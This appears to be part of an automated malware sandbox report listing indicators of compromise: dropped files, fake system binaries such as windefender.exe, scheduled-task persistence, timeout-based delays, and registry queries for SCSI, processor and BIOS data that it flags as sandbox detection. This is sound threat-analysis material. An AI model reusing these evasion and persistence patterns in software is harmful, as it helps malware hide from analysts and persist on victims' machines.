File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\hi\messages.json	SxjcCox.exe
File opened for modification	C:\Program Files (x86)\yjiDqdgnMIE\files\Kernel.js	SxjcCox.exe
File created	C:\Program Files (x86)\MCoLVEAxuDhpC\nkyMnUp.dll	SxjcCox.exe
File created	C:\Program Files (x86)\MCoLVEAxuDhpC\ETfSDLy.xml	SxjcCox.exe
File created	C:\Program Files (x86)\hxLIpSuPLJUn\GslyyuU.dll	QDsgliQ.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\sk\messages.json	DNnZcAy.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\vi\messages.json	DNnZcAy.exe
File created	C:\Program Files (x86)\MCoLVEAxuDhpC\IUfyEPN.dll	DNnZcAy.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\el\messages.json	DNnZcAy.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-LUNK2.tmp	vpn.tmp
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\he\messages.json	QDsgliQ.exe
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-6HRTV.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\version	MaskVPNUpdate.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\ro\messages.json	QDsgliQ.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\th\messages.json	QDsgliQ.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\en\messages.json	DNnZcAy.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Globalization.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\Wispy-Brook\winamp.exe	7za.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\fr\messages.json	SxjcCox.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\de\messages.json	QDsgliQ.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\fil\messages.json	QDsgliQ.exe
File created	C:\Program Files (x86)\Hidden-Thunder\7za.dll	setup.exe
File created	C:\Program Files (x86)\Hidden-Thunder\7za.exe	setup.exe
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-MET3S.tmp	vpn.tmp
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\et\messages.json	SxjcCox.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\sq\messages.json	DNnZcAy.exe
File created	C:\Program Files (x86)\MaskVPN\is-5BCTT.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-2R8T7.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Wispy-Brook\winamp.7z	setup.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\he\messages.json	DNnZcAy.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\it\messages.json	DNnZcAy.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-LVKC5.tmp	vpn.tmp
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\en_GB\messages.json	DNnZcAy.exe
File created	C:\Program Files (x86)\MaskVPN\is-OK603.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-NN31L.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-MIEIH.tmp	vpn.tmp
File created	C:\Program Files (x86)\Picture Lab\is-F17M8.tmp	prolab.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-3ND7Q.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-SV1JA.tmp	vpn.tmp
File created	C:\Program Files (x86)\yjiDqdgnMIE\MkWeJlP.exe	SxjcCox.exe
File created	C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\zh_CN\messages.json	QDsgliQ.exe
File created	C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\FvbUmvv.xml	DNnZcAy.exe

Drops file in Windows directory 37 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exemultitimer.exeapp.exeMicrosoftEdge.exeschtasks.exeschtasks.exemultitimer.exeMicrosoftEdge.exeDrvInst.exemultitimer.exeschtasks.exemultitimer.exeschtasks.exeschtasks.exemultitimer.exesvchost.exeDrvInst.exeWerFault.exeschtasks.exeMicrosoftEdge.execsrss.exeschtasks.exeschtasks.exeschtasks.exetapinstall.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\bWIRRaDZCpCYZHZEtf.job	schtasks.exe
File created	C:\Windows\Tasks\hMZOFgVuABkGdcuhk.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\cbBtQoNpOByPPTwrn.job	schtasks.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\rss	app.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Tasks\cbBtQoNpOByPPTwrn.job	schtasks.exe
File created	C:\Windows\Tasks\bWIRRaDZCpCYZHZEtf.job	schtasks.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File created	C:\Windows\rss\csrss.exe	app.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\Tasks\qTJPyBJZsADsDDd.job	schtasks.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Tasks\cbBtQoNpOByPPTwrn.job	schtasks.exe
File created	C:\Windows\Tasks\bWIRRaDZCpCYZHZEtf.job	schtasks.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\Tasks\qTJPyBJZsADsDDd.job	schtasks.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File created	C:\Windows\INF\oem2.PNF	DrvInst.exe
File created	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Tasks\bWIRRaDZCpCYZHZEtf.job	schtasks.exe
File created	C:\Windows\Tasks\qTJPyBJZsADsDDd.job	schtasks.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\Tasks\bWIRRaDZCpCYZHZEtf.job	schtasks.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 23 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
7036	4872	WerFault.exe	xw204n1ofqr.exe
4756	4872	WerFault.exe	xw204n1ofqr.exe
5736	4872	WerFault.exe	xw204n1ofqr.exe
6924	4872	WerFault.exe	xw204n1ofqr.exe
4712	4872	WerFault.exe	xw204n1ofqr.exe
8088	4872	WerFault.exe	xw204n1ofqr.exe
8144	4872	WerFault.exe	xw204n1ofqr.exe
4776	7104	WerFault.exe	56A5.tmp.exe
8300	4152	WerFault.exe	MicrosoftEdgeCP.exe
12960	10472	WerFault.exe	ugk5iqmtyu1.exe
12220	10472	WerFault.exe	ugk5iqmtyu1.exe
12532	10472	WerFault.exe	ugk5iqmtyu1.exe
12824	10472	WerFault.exe	ugk5iqmtyu1.exe
10660	10472	WerFault.exe	ugk5iqmtyu1.exe
14740	10472	WerFault.exe	ugk5iqmtyu1.exe
14504	10472	WerFault.exe	ugk5iqmtyu1.exe
14048	7924	WerFault.exe	rp03erkobpf.exe
15092	7924	WerFault.exe	rp03erkobpf.exe
2612	7924	WerFault.exe	rp03erkobpf.exe
6028	7924	WerFault.exe	rp03erkobpf.exe
16120	7924	WerFault.exe	rp03erkobpf.exe
15468	7924	WerFault.exe	rp03erkobpf.exe
16496	7924	WerFault.exe	rp03erkobpf.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

DrvInst.exesvchost.exetapinstall.exeprivacytools5.exesvchost.exeprivacytools5.exeDrvInst.exeprivacytools5.exevict.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	vict.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	svchost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	vict.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom	DrvInst.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

Setup.exeSetup.exeSetup.exeSetup.exejjSCW2eoA.exeSetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	jjSCW2eoA.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	jjSCW2eoA.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe

Creates scheduled task(s) 1 TTPs 38 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
6392	schtasks.exe
12440	schtasks.exe
12196	schtasks.exe
16180	schtasks.exe
6460	schtasks.exe
5088	schtasks.exe
16108	schtasks.exe
15024	schtasks.exe
14248	schtasks.exe
15136	schtasks.exe
10272	schtasks.exe
13324	schtasks.exe
9060	schtasks.exe
11316	schtasks.exe
10760	schtasks.exe
14964	schtasks.exe
6860	schtasks.exe
10140	schtasks.exe
8324	schtasks.exe
11964	schtasks.exe
13528	schtasks.exe
5988	schtasks.exe
360	schtasks.exe
14876	schtasks.exe
7840	schtasks.exe
10880	schtasks.exe
2392	schtasks.exe
8040	schtasks.exe
18108	schtasks.exe
10636	schtasks.exe
6304	schtasks.exe
3100	schtasks.exe
14588	schtasks.exe
13224	schtasks.exe
16668	schtasks.exe
12116	schtasks.exe
8060	schtasks.exe
9000	schtasks.exe

Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

8744 timeout.exe
500 timeout.exe
9380 timeout.exe
8712 timeout.exe
14128 timeout.exe

pid	process
8744	timeout.exe
500	timeout.exe
9380	timeout.exe
8712	timeout.exe
14128	timeout.exe

Enumerates system info in registry 2 TTPs 26 IoCs

Query Registry

System Information Discovery

Processes:

setup.exemultitimer.exesetup.exeppBOOOa.exesetup.exemultitimer.exerundll32.exesetup.exesetup.exemultitimer.exemultitimer.exemultitimer.exexcopy.exexcopy.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	ppBOOOa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	ppBOOOa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	setup.exe
